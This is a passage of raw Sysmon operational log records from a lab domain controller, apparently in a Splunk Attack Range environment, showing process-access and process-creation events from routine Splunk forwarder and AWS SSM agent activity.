L32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.419{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.418{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.418{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.418{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.418{5EBD8912-8CD2-6151-4300-00000000FD01}37603936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+6f23e 154100x80000000000000001053993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.418{5EBD8912-8CD5-6151-5D00-00000000FD01}2828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\AwsNitroEnclaves'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8CD2-6151-4300-00000000FD01}3760C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000001053992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.400{5EBD8912-8CD4-6151-5600-00000000FD01}3348NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-5C00-00000000FD01}2184C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD5-6151-5C00-00000000FD01}2184C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CD5-6151-5B00-00000000FD01}36923744C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5EBD8912-8CD5-6151-5C00-00000000FD01}2184C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.227{5EBD8912-8CD5-6151-5C00-00000000FD01}2184C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5EBD8912-8CD5-6151-5B00-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001053978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053977Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CBD-6151-0B00-00000000FD01}640672C:\Windows\system32\lsass.exe{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.220{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD5-6151-5B00-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:21.204{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 